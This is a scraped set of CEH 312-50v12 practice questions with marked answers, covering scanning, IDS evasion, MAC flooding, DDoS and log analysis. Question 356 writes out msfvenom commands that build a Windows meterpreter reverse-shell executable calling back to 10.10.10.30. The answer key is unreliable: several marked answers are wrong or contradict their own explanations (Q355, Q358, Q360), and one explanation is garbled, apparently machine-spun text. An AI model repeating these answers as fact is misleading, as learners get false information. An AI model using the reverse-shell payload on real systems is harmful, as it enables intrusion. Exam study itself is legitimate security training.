EC-COUNCIL 312-50V12 Online Practice Questions and Exam Preparation

EC-COUNCIL 312-50V12 Online Questions & Answers

• Question 351:

  Roma is a member of a security team. She was tasked with protecting the internal network of an organization from imminent threats. To accomplish this task, Roma fed threat intelligence into the security devices in a digital format to block and

  identify inbound and outbound malicious traffic entering the organization's network.

  Which type of threat intelligence is used by Roma to secure the internal network?

  A. Technical threat intelligence
  B. Operational threat intelligence
  C. Tactical threat intelligence
  D. Strategic threat intelligence
  A. Technical threat intelligence

• Question 352:

  Techno Security Inc. recently hired John as a penetration tester. He was tasked with identifying open ports in the target network and determining whether the ports are online and any firewall rule sets are encountered. John decided to perform a TCP SYN ping scan on the target network. Which of the following Nmap commands must John use to perform the TCP SVN ping scan?

  A. nmap -sn -pp < target ip address >
  B. nmap -sn -PO < target IP address >
  C. Anmap -sn -PS < target IP address >
  D. nmap -sn -PA < target IP address >
  C. Anmap -sn -PS < target IP address >

  ---

  Explanation/Reference:

  https://hub.packtpub.com/discovering-network-hosts-with-tcp-syn-and-tcp-ack-ping-scans-in-nmaptutorial/

• Question 353:

  Kevin, a professional hacker, wants to penetrate CyberTech Inc.'s network. He employed a technique, using which he encoded packets with Unicode characters. The company's IDS cannot recognize the packet, but the target web server can

  decode them.

  What is the technique used by Kevin to evade the IDS system?

  A. Desynchronization
  B. Obfuscating
  C. Session splicing
  D. Urgency flag
  B. Obfuscating

  ---

  Explanation/Reference:

  Adversaries could decide to build an possible or file difficult to find or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. this is often common behavior which will be used across totally different

  platforms and therefore the network to evade defenses.

  Payloads may be compressed, archived, or encrypted so as to avoid detection. These payloads may be used throughout Initial Access or later to mitigate detection. typically a user's action could also be needed to open and Deobfuscate/

  Decode Files or info for User Execution. The user can also be needed to input a parole to open a parole protected compressed/encrypted file that was provided by the mortal. Adversaries can also used compressed or archived scripts, like

  JavaScript.

  Portions of files can even be encoded to cover the plain-text strings that will otherwise facilitate defenders with discovery. Payloads can also be split into separate, ostensibly benign files that solely reveal malicious practicality once

  reassembled. Adversaries can also modify commands dead from payloads or directly via a Command and Scripting Interpreter. surroundings variables, aliases, characters, and different platform/language specific linguistics may be wont to

  evade signature based mostly detections and application management mechanisms.

• Question 354:

  Switches maintain a CAM Table that maps individual MAC addresses on the network to physical ports on the switch.

  

  In MAC flooding attack, a switch is fed with many Ethernet frames, each containing different source MAC addresses, by the attacker. Switches have a limited memory for mapping various MAC addresses to physical ports. What happens when the CAM table becomes full?

  A. Switch then acts as hub by broadcasting packets to all machines on the network
  B. The CAM overflow table will cause the switch to crash causing Denial of Service
  C. The switch replaces outgoing frame switch factory default MAC address of FF:FF:FF:FF:FF:FF
  D. Every packet is dropped and the switch sends out SNMP alerts to the IDS port
  A. Switch then acts as hub by broadcasting packets to all machines on the network

• Question 355:

  Gavin owns a white-hat firm and is performing a website security audit for one of his clients. He begins by running a scan which looks for common misconfigurations and outdated software versions. Which of the following tools is he most likely using?

  A. Nikto
  B. Nmap
  C. Metasploit
  D. Armitage
  B. Nmap

• Question 356:

  What is the correct way of using MSFvenom to generate a reverse TCP shellcode for windows?

  A. msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.10.30 LPORT=4444 -f c
  B. msfvenom -p windows/meterpreter/reverse_tcp RHOST=10.10.10.30 LPORT=4444 -f c
  C. msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.10.30 LPORT=4444 -f exe > shell.exe
  D. msfvenom -p windows/meterpreter/reverse_tcp RHOST=10.10.10.30 LPORT=4444 -f exe > shell.exe
  C. msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.10.30 LPORT=4444 -f exe > shell.exe

  ---

  Explanation/Reference:

  https://github.com/rapid7/metasploit-framework/wiki/How-to-use-msfvenom Often one of the most useful (and to the beginner underrated) abilities of Metasploit is the msfpayload module. Multiple payloads can be created with this module and

  it helps something that can give you a shell in almost any situation. For each of these payloads you can go into msfconsole and select exploit/multi/handler. Run `set payload' for the relevant payload used and configure all necessary options

  (LHOST, LPORT, etc). Execute and wait for the payload to be run. For the examples below it's pretty self explanatory but LHOST should be filled in with your IP address (LAN IP if attacking within the network, WAN IP if attacking across the

  internet), and LPORT should be the port you wish to be connected back on.

  Example for Windows:

  - msfvenom -p windows/meterpreter/reverse_tcp LHOST= LPORT=< Your Port to Connect On> -f exe > shell.exe

• Question 357:

  Jack, a professional hacker, targets an organization and performs vulnerability scanning on the target web server to identify any possible weaknesses, vulnerabilities, and misconfigurations. In this process, Jack uses an automated tool that eases his work and performs vulnerability scanning to find hosts, services, and other vulnerabilities in the target server. Which of the following tools is used by Jack to perform vulnerability scanning?

  A. Infoga
  B. WebCopier Pro
  C. Netsparker
  D. NCollector Studio
  C. Netsparker

• Question 358:

  A well-resourced attacker intends to launch a highly disruptive DDoS attack against a major online retailer. The attacker aims to exhaust all the network resources while keeping their identity concealed. Their method should be resistant to simple defensive measures such as IP-based blocking. Based on these objectives, which of the following attack strategies would be most effective?

  A. The attacker should instigate a protocol-based SYN flood attack, consuming connection state tables on the retailer's servers
  B. The attacker should execute a simple ICMP flood attack from a single IP, exploiting the retailer's ICMP processing
  C. The attacker should leverage a botnet to launch a Pulse Wave attack, sending high- volume traffic pulses at regular intervals
  D. The attacker should initiate a volumetric flood attack using a single compromised machine to overwhelm the retailer's network bandwidth
  A. The attacker should instigate a protocol-based SYN flood attack, consuming connection state tables on the retailer's servers

  ---

  Explanation/Reference:

  A Pulse Wave attack is a type of DDoS attack that uses a botnet to send high-volume traffic pulses at regular intervals, typically lasting for a few minutes each. The attacker can adjust the frequency and duration of the pulses to maximize the impact and evade detection. A Pulse Wave attack can exhaust the network resources of the target, as well as the resources of any DDoS mitigation service that the target may use. A Pulse Wave attack can also conceal the attacker's identity, as the traffic originates from multiple sources that are part of the botnet. A Pulse Wave attack can bypass simple defensive measures, such as IP-based blocking, as the traffic can appear legitimate and vary in source IP addresses. The other options are less effective or feasible for the attacker's objectives. A protocol- based SYN flood attack is a type of DDoS attack that exploits the TCP handshake process by sending a large number of SYN requests to the target server, without completing the connection. This consumes the connection state tables on the server, preventing it from accepting new connections. However, a SYN flood attack can be easily detected and mitigated by using SYN cookies or firewalls. A SYN flood attack can also expose the attacker's identity, as the source IP addresses of the SYN requests can be traced back to the attacker. An ICMP flood attack is a type of DDoS attack that sends a large number of ICMP packets, such as ping requests, to the target server, overwhelming its ICMP processing capacity. However, an ICMP flood attack from a single IP can be easily blocked by using IP-based filtering or disabling ICMP responses. An ICMP flood attack can also reveal the attacker's identity, as the source IP address of the ICMP packets can be identified. A volumetric flood attack is a type of DDoS attack that sends a large amount of traffic to the target server, saturating its network bandwidth and preventing legitimate users from accessing it. However, a volumetric flood attack using a single compromised machine may not be sufficient to overwhelm the network bandwidth of a major online retailer, as the attacker's machine may have limited bandwidth itself. A volumetric flood attack can also be detected and mitigated by using traffic shaping or rate limiting techniques. References: Pulse Wave DDoS Attacks: What You Need to Know DDoS Attack Prevention: 7 Effective Mitigation Strategies DDoS Attack Types: Glossary of Terms DDoS Attacks: What They Are and How to Protect Yourself DDoS Attack Prevention: How to Protect Your Website

• Question 359:

  An incident investigator asks to receive a copy of the event logs from all firewalls, proxy servers, and Intrusion Detection Systems (IDS) on the network of an organization that has experienced a possible breach of security. When the

  investigator attempts to correlate the information in all of the logs, the sequence of many of the logged events do not match up.

  What is the most likely cause?

  A. The network devices are not all synchronized.
  B. Proper chain of custody was not observed while collecting the logs.
  C. The attacker altered or erased events from the logs.
  D. The security breach was a false positive.
  A. The network devices are not all synchronized.

  ---

  Explanation/Reference:

  Many network and system administrators don't pay enough attention to system clock accuracy and time synchronization. Computer clocks can run faster or slower over time, batteries and power sources die, or daylight-saving time changes are forgotten. Sure, there are many more pressing security issues to deal with, but not ensuring that the time on network devices is synchronized can cause problems. And these problems often only come to light after a security incident. If you suspect a hacker is accessing your network, for example, you will want to analyze your log files to look for any suspicious activity. If your network's security devices do not have synchronized times, the timestamps' inaccuracy makes it impossible to correlate log files from different sources. Not only will you have difficulty in tracking events, but you will also find it difficult to use such evidence in court; you won't be able to illustrate a smooth progression of events as they occurred throughout your network.

• Question 360:

  One of your team members has asked you to analyze the following SOA record. What is the version? Rutgers.edu.SOA NS1.Rutgers.edu ipad.college.edu (200302028 3600 3600 604800 2400.) (Choose four.)

  A. 200303028
  B. 3600
  C. 604800
  D. 2400
  E. 60
  F. 4800
  A. 200303028